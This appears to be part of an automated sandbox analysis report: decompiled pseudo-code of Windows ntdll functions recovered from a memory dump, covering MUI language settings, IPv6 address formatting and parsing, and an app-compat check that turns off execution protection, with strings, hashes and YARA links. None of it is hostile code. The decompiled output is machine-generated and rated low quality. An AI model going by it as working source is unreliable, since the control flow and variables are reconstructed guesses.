					_v40 = _t322;
					E020E718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E020CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E020C2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E020DE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E020CE2A8(_v12,  &_v68, _v16);
							if(E020E5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E020DE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E020CE2A8(_t322,  &_v68, _t269);
							if(E020E5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E020CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E020CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E020E718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E020CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E020C2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E020DE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E020CE2A8(_v12,  &_v68, _v16);
						if(E020E5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E020DE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E020CE2A8(_t322,  &_v68, _t296);
						if(E020E5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E020CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E020CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x020e8788
0x020e8788
0x020e8791
0x020e8794
0x020e8798
0x020e879b
0x020e879e
0x020e87a1
0x020e87a4
0x020e87a7
0x020e87aa
0x020e87af
0x02131ad3
0x020e8b0a
0x020e8b0d
0x020e8b13
0x020e8b19
0x020e8b1f
0x020e8b25
0x020e8b2b
0x020e8b31
0x020e8b37
0x020e8b3d
0x020e8b46
0x020e8b46
0x020e87c6
0x020e87d0
0x02131ae0
0x02131ae6
0x02131af8
0x02131af8
0x02131afd
0x02131afe
0x02131b01
0x02131b06
0x02131b06
0x020e87d6
0x020e87f2
0x020e87f7
0x020e8807
0x020e880a
0x020e880f
0x020e8810
0x020e8813
0x020e8818
0x020e8818
0x020e882c
0x020e8831
0x020e8838
0x020e8908
0x020e8920
0x020e89f0
0x020e8a08
0x020e8af6
0x020e8af6
0x020e8af8
0x020e8afb
0x02131beb
0x02131beb
0x020e8b04
0x02131bf8
0x02131c0e
0x02131c13
0x02131c16
0x02131c16
0x02131bf8
0x00000000
0x020e8b04
0x020e8a0e
0x020e8a11
0x020e8a14
0x020e8a15
0x020e8a18
0x020e8a22
0x020e8b59
0x020e8a28
0x020e8a3c
0x020e8a3c
0x020e8a42
0x02131bb0
0x02131b11
0x02131b11
0x00000000
0x020e8a48
0x020e8a51
0x020e8a5b
0x020e8a5e
0x020e8a61
0x020e8a69
0x020e8a69
0x020e8a6d
0x00000000
0x00000000
0x020e8a74
0x020e8a7c
0x020e8a7d
0x020e8a91
0x020e8a93
0x020e8a93
0x020e8a98
0x020e8a9b
0x020e8aa1
0x020e8aa1
0x020e8aa4
0x020e8aaa
0x020e8ab1
0x020e8ac5
0x020e8ac7
0x020e8ac7
0x020e8ac5
0x020e8ace
0x02131bc9
0x02131bce
0x02131bd2
0x02131bd2
0x020e8ad8
0x020e8aeb
0x020e8aeb
0x020e8af0
0x020e8af4
0x00000000
0x020e8af4
0x020e8a42
0x020e8926
0x020e8929
0x020e892c
0x020e892d
0x020e8930
0x020e8935
0x020e893a
0x020e8b51
0x020e8940
0x020e8954
0x020e8954
0x020e895a
0x02131b63
0x00000000
0x020e8960
0x020e8969
0x020e8973
0x020e8976
0x020e8979
0x020e897e
0x020e8981
0x020e8981
0x020e8986
0x00000000
0x00000000
0x02131b6e
0x02131b74
0x02131b7b
0x02131b8f
0x02131b91
0x02131b91
0x02131b99
0x02131b9c
0x02131ba2
0x02131ba2
0x020e898c
0x020e8992
0x020e8999
0x020e89ad
0x02131ba8
0x02131ba8
0x020e89ad
0x020e89b6
0x020e89c8
0x020e89cd
0x020e89d0
0x020e89d0
0x020e89d6
0x020e89e8
0x020e89e8
0x020e89ed
0x00000000
0x020e89ed
0x020e895a
0x020e883e
0x020e8841
0x020e8844
0x020e8845
0x020e8848
0x020e884d
0x020e8852
0x020e8b49
0x020e8858
0x020e886c
0x020e886c
0x020e8872
0x02131b0e
0x00000000
0x020e8878
0x020e8881
0x020e888b
0x020e888e
0x020e8891
0x020e8896
0x020e8899
0x020e8899
0x020e889e
0x00000000
0x00000000
0x02131b21
0x02131b27
0x02131b2e
0x02131b42
0x02131b44
0x02131b44
0x02131b4c
0x02131b4f
0x02131b55
0x02131b55
0x020e88a4
0x020e88aa
0x020e88b1
0x020e88c5
0x02131b5b
0x02131b5b
0x020e88c5
0x020e88ce
0x020e88e0
0x020e88e5
0x020e88e8
0x020e88e8
0x020e88ee
0x020e8900
0x020e8900
0x020e8905
0x00000000
0x020e8905

APIs

_wcspbrk.LIBCMT ref: 020E8891
_wcspbrk.LIBCMT ref: 020E8979
_wcspbrk.LIBCMT ref: 020E8A61
_wcspbrk.LIBCMT ref: 020E8A9B
_wcspbrk.LIBCMT ref: 02131B9C

Strings

Kernel-MUI-Language-Allowed, xrefs: 020E8827
Kernel-MUI-Language-Disallowed, xrefs: 020E8914
Kernel-MUI-Language-SKU, xrefs: 020E89FC
Kernel-MUI-Number-Allowed, xrefs: 020E87E6
WindowsExcludedProcs, xrefs: 020E87C1

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: a420645ea9c6eaaa654ec39f5e017aa178d9ad451a1af5eed2e4fdbf7df75cf3
Instruction ID: 5dcc37e76926376a8c44cff8f65a85af913f8f858dadb99f554b1c81fcf6b412
Opcode Fuzzy Hash: a420645ea9c6eaaa654ec39f5e017aa178d9ad451a1af5eed2e4fdbf7df75cf3
Instruction Fuzzy Hash: 5FF1D6B2D00209EFDF51DF94C9849EEB7B9FF08304F14846AE506A7620E7359A85EF61

Uniqueness

Uniqueness Score: -1.00%

Function 021013CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E021013CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E020F7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x20c2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E020F7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x20c9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E020F7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E020F7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E020F7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E020F7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x021013d5
0x021013d9
0x021013dc
0x021013de
0x021013e1
0x021013e8
0x021013ee
0x0212e8fd
0x00000000
0x0212e921
0x0212e921
0x0212e928
0x0212e982
0x0212e98a
0x00000000
0x0212e99a
0x0212e99e
0x0212e9a3
0x0212e9a8
0x0212e9b9
0x0212e978
0x00000000
0x0212e978
0x0212e98a
0x0212e92a
0x0212e931
0x0212e944
0x0212e944
0x0212e950
0x0212e954
0x0212e959
0x0212e95e
0x0212e963
0x0212e970
0x00000000
0x0212e975
0x0212e93b
0x0212e980
0x00000000
0x0212e980
0x0212e942
0x0212e94b
0x00000000
0x0212e94b
0x00000000
0x0212e942
0x021013f4
0x021013f4
0x021013f9
0x021013fc
0x021013ff
0x02101406
0x0212e9cc
0x0212e9d2
0x0212e9d2
0x0212e9cc
0x0210140c
0x02101411
0x02101431
0x0210143a
0x0210143c
0x0210143f
0x0210143f
0x02101442
0x02101447
0x021014a8
0x021014ac
0x0212e9e2
0x0212e9e7
0x0212e9ec
0x0212ea05
0x0212ea05
0x00000000
0x02101449
0x00000000
0x02101449
0x0210144c
0x02101459
0x02101462
0x02101469
0x0210146a
0x02101470
0x02101473
0x02101476
0x02101476
0x02101490
0x02101495
0x0210138e
0x02101390
0x02101397
0x02101398
0x02101399
0x021013a1
0x021013a4
0x021013a4
0x02101498
0x0210149c
0x0210149f
0x021014a2
0x00000000
0x00000000
0x021014a4
0x00000000
0x021014a4
0x02101413
0x02101415
0x02101416
0x02101419
0x0210141c
0x02101422
0x021013b7
0x021013bc
0x021013bf
0x021013bf
0x021013c2
0x02101424
0x02101424
0x02101424
0x02101427
0x0210142b
0x0210142c
0x0210142c
0x0210142c
0x00000000
0x0210141c
0x02101411

APIs

___swprintf_l.LIBCMT ref: 0210146B
___swprintf_l.LIBCMT ref: 02101490
___swprintf_l.LIBCMT ref: 0212E970

Strings

ffff:, xrefs: 0212E94B
::%hs%u.%u.%u.%u, xrefs: 0212E967
:%u.%u.%u.%u, xrefs: 0212E9F4
::ffff:0:%u.%u.%u.%u, xrefs: 0212E9B0

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 582285967b5666e2992eaab4a65f45714bcf6b435c9873181a7efc1f1c0eb6ab
Instruction ID: 5624c526524f03deea658ec9894a95561a17a2432daae44c71dd2cc5e6dc9a71
Opcode Fuzzy Hash: 582285967b5666e2992eaab4a65f45714bcf6b435c9873181a7efc1f1c0eb6ab
Instruction Fuzzy Hash: C56105B1940755BADF28CF59C8C09BFBBB5EF84300B54C12EF5DA9A580D7B8A640DB60

Uniqueness

Uniqueness Score: -1.00%

Function 020F7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E020F7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x21a2088; // 0x775be7af
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E020F7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02113F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E020CDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x21a4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02113F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E020D0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02113F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E020D8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02113F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0213E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02113F92();
					_t38 = 1;
					L2:
					return E020CE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x020f7f08
0x020f7f0f
0x020f7f12
0x020f7f1b
0x020f7f31
0x02113ead
0x02113eb4
0x00000000
0x00000000
0x02113eba
0x02113ecd
0x02113ed2
0x02113ee1
0x02113ee7
0x02113eec
0x02113f12
0x02113f18
0x02113f1a
0x00000000
0x00000000
0x02113f20
0x02113f26
0x02113f28
0x00000000
0x00000000
0x02113f2e
0x02113f30
0x00000000
0x00000000
0x02113f3a
0x02113f3b
0x02113f53
0x02113f64
0x02113f69
0x02113f6c
0x02113f6d
0x02113f6f
0x0211e304
0x0211e30f
0x0211e315
0x0211e31e
0x0211e321
0x0211e327
0x0211e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0211e32f
0x0211e32f
0x0211e337
0x0211e33a
0x0211e33b
0x0211e33d
0x0211e33f
0x0211e341
0x0211e341
0x0211e34e
0x0211e353
0x0211e358
0x0211e35d
0x0211e35f
0x00000000
0x00000000
0x0211e365
0x0211e365
0x0211e368
0x0211e36e
0x00000000
0x00000000
0x0211e374
0x0211e32f
0x02113f75
0x02113f7a
0x02113f7c
0x02113f7e
0x02113f86
0x020f7f39
0x020f7f47
0x020f7f47
0x020f7f37
0x020f7f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02113F12

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02113F75
ExecuteOptions, xrefs: 02113F04
Execute=1, xrefs: 02113F5E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02113F4A
CLIENT(ntdll): Processing section info %ws..., xrefs: 0211E345
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0211E2FB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02113EC4

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 184d3b0048b27562cac6b72be1edaad3219083f4a9773ee2e8fe16af102cd616
Instruction ID: af73dca7390d3e9335bc3fee1c6de81e693276b46a1e9ff44f087cea3c08a7c9
Opcode Fuzzy Hash: 184d3b0048b27562cac6b72be1edaad3219083f4a9773ee2e8fe16af102cd616
Instruction Fuzzy Hash: 7D4107716C030D7EEB60DB94DCC5FDFB3BDAF18700F0004A9A605A6490E7709A499F61

Uniqueness

Uniqueness Score: -1.00%

Function 02100B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02100B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E020D8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E020CDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02100CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02100CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E021006BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E021006BA(_t135, _t178) == 0 || E02100A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02100CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02100CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E021006BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E021006BA(_t124, _t142) == 0 || E02100A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x02100b21
0x02100b24
0x02100b27
0x02100b2a
0x02100b2d
0x02100b30
0x02100b33
0x02100b36
0x02100b39
0x02100b3e
0x02100c65
0x02100c68
0x02100c6a
0x02100c6f
0x0212eb42
0x00000000
0x00000000
0x0212eb48
0x0212eb48
0x02100c75
0x02100c7a
0x0212eb54
0x00000000
0x00000000
0x00000000
0x0212eb5a
0x02100c80
0x02100c84
0x0212eb98
0x00000000
0x00000000
0x0212eba6
0x02100cb8
0x02100cba
0x02100cd3
0x02100cda
0x02100ce4
0x02100ce9
0x00000000
0x02100cec
0x02100c8c
0x0212eb63
0x00000000
0x00000000
0x0212eb70
0x0212eb75
0x0212eb7d
0x00000000
0x00000000
0x0212eb8c
0x00000000
0x0212eb8c
0x02100c96
0x00000000
0x00000000
0x02100ca2
0x02100cac
0x02100cb4
0x00000000
0x00000000
0x02100b44
0x02100b47
0x02100b49
0x00000000
0x00000000
0x02100b4f
0x02100b50
0x00000000
0x00000000
0x02100b56
0x02100b62
0x02100b7c
0x02100bac
0x02100a0f
0x0212eaaa
0x00000000
0x0212eac4
0x0212eac4
0x02100bd0
0x02100bd0
0x02100bd4
0x02100bd9
0x00000000
0x00000000
0x02100bdb
0x02100be0
0x0212eb0e
0x02100a1a
0x00000000
0x02100a1a
0x0212eb1a
0x0212eb1f
0x0212eb27
0x00000000
0x00000000
0x0212eb36
0x00000000
0x0212eb36
0x02100bea
0x00000000
0x00000000
0x02100bf6
0x02100c00
0x02100c03
0x02100c0b
0x00000000
0x02100c0b
0x0212eaaa
0x00000000
0x02100a15
0x02100bb6
0x00000000
0x02100bc6
0x02100bc6
0x02100bcb
0x02100c15
0x00000000
0x00000000
0x02100c1d
0x02100c20
0x02100c21
0x02100c24
0x02100c24
0x02100c26
0x00000000
0x02100c26
0x02100bcd
0x00000000
0x02100bcd
0x02100b89
0x02100b89
